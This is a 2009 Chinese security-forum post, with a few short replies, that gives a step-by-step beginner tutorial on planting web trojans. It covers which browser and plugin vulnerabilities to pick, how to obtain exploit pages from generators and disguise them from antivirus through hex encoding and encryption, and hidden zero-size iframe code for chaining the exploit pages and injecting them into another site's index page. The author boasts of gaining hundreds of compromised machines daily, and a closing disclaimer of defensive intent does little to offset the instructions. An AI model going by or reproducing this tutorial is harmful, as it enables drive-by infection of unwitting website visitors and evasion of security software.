Board logo

标题: 揭秘黑客们是怎么挂马的(附挂马教程)菜鸟一看就懂! [打印本页]

作者: yyw258520    时间: 2009-7-22 11:15     标题: 揭秘黑客们是怎么挂马的(附挂马教程)菜鸟一看就懂!

揭秘黑客们是怎么挂马的(附挂马教程)菜鸟一看就懂!

关键词:
挂马 = 在网页上放置一串 iframe 隐藏调用代码,链接置配置好的网马地址。
网马 = 用来搜索客户端系统或第三方软件漏洞并下载、执行木马的一个网页。
漏洞 = 分为系统漏洞和软件漏洞,网马的成功执行前提是客户端必需有相应的漏洞。
中率 = 网马的中招率,也就是中马的概率,如1000个IP访问了挂了马的网页,其中200个成功的中了木马,其网马的中率就是20%。
肉鸡 = 任人宰割的机器,简称肉机,俗称:肉鸡。黑客拥有肉鸡的远程完全控制权。

想必现在有些站长也有别人挂过马的经历吧,那么请花几分钟看完这篇文章。
大家都知道的,这年头很多机器都装了360,杀毒软件,系统全部自动打补丁了。很多人说靠一些免费的网马生成器,是不会有多少中率的。
现在大家看看如何制作一份属于自己的网马,免杀可能不能过一些杀毒软件的主动防御。但是我用这种自己的做网马的方式,日流量5000左右的站,挂一天也能上300~400个肉鸡。
百度搜索 网马,第一个,是个博客,在里面找到了很多网马生成器。经过我的一些测试,在这里下载了3个网马生成器。很多网马生成器,有些很垃圾,shellcode完全是唬烂的,根本不能运行。

一个是综合漏洞网马,一个是ie70day漏洞网马。还有一个独立的flash漏洞网马生成器。他的免费综合网马已经包含了flash.,所以就不下载flash生成器了。
大家先下载下来。免费发布的版本,是别想免杀了,收费的买不起,自己研究了很久,也成功地做出了属于自己的免杀网马!
瑞星2009还是过不去,太牛X了。flash的漏洞卡巴主动也过不去。其他的基本都能过了。
现在把方法讲解给大家。

,首先是漏洞的选择.我推荐的组合是:MS06014+MS08053+暴风漏洞+real11+flash+IE7
为什么选取这些漏洞呢,因为ms06014是经典的漏洞,08053运行的成功率高。很多的番茄啊,深度的系统,默认都是使用暴风影音的,这样的软件很少有人会去下载新版本,新版本广告多而且不稳定。real11的安装量也很大。flash不用说,只要是sp2的系统刚刚装完,flash基本是115版本的,肯定能中。。IE7新出的,。网上生成器很多,我找了1晚上,在上面说的那个网站上面下载的是我唯一运行成功的。shellcode编写的很不错,下载那个高级版本的生成。
用iframe框架来调用。首先其他的几个洞洞全部是htm格式的。免杀的方法是,在网上找网页加密器。
搜索一下很多的。主要是进制的转换,或者大小写改下。再这里可以下载到一个进制转换器。全部转换成16进制的、http://download.csdn.net/source/764837凡是生成htm格式的,全部用记事本打开之后。转换进制。或者再里面加上一些干扰的文字,主要是不要破坏网马的完整性。然后就是加密,转换进制。关于flash网马,我曾经尝试用myccl修改,但是卡巴本地扫描不出来,一上传,开启主动就杀毒的叫了。这个我也没辙了。反正叫就叫吧,照样挂上。这个是个技术活,也是个体力活。
几个洞全部制作完毕之后,就利用iframe框架调用。比如生成的漏洞为 ms06014.htm ms08053.htm.real.htm.flash.htm  就自己新建一个HTM的页面,如muma.htm,用记事本编辑。
内容如下:
<iframe src=www.1.com/ms06014.htm width=0 height=0></iframe>
<iframe src=www.1.com/ms08053.htm width=0 height=0></iframe>
<iframe src=www.1.com/realhtm width=0 height=0></iframe>
<iframe src=www.1.com/flash.htm width=0 height=0></iframe>
然后把muma.htm和ms06014.htm ms08053.htm.real.htm.flash.htm这几个网页文件和你的木马放在同一个文件夹内,上传至FTP。
然后就可以在任何网页上挂马了。怎么挂?对,很简单,还是用 iframe
代码就是这个 <iframe src=域名/网马的目录/网马文件名 width=0 height=0></iframe>
看得出来 width=0 height=0 宽度和高度都是0,也就是不显示。
比如你的域名是http://www.abc.com,网马放在根目录的 def 文件夹下面。那么代码就是:
<iframe src=www.abc.com/def/muma.htm width=0 height=0></iframe>
例如要在http://www.xxx.com的首页挂马,如他的首页文件是 index.html,那么打开index.html,编辑index.html,在网页里放入你的代码,也就是<iframe src=www.abc.com/def/muma.htm width=0 height=0></iframe>,那么,别人只要打开访问了http://www.xxx.com就等于执行了你的网马,如果他的电脑有相应的漏洞,那么可以恭喜他,中了你的木马。
还有一些js的挂马方式,js变形就需要基本的一些网页制作知识了。这里就不多说了。辛辛苦苦打了这么多字,希望各位对网页木马有基本的了解。有什么错误不足请高手指正~
看完了觉得有点启发的话,请回个贴~
在此声明,所写的这篇文章不是鼓励大家去挂马,而是让大家对网马有所了解,有基本的防范意识。
因为刚才喝多了点酒,写的有点乱,有时间回头改改,请见谅~
作者: renzhexiang741    时间: 2009-7-23 08:52

沙发 。。。。。。。。。。。。。。。。。。。。。。。。
作者: vip5234347    时间: 2009-7-26 10:25

看不懂....................
作者: kim    时间: 2009-7-29 10:40

还是不懂也,主要是我太菜了!
作者: ggbuku    时间: 2009-7-29 12:54

这个很实用,必须要顶一下啊




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2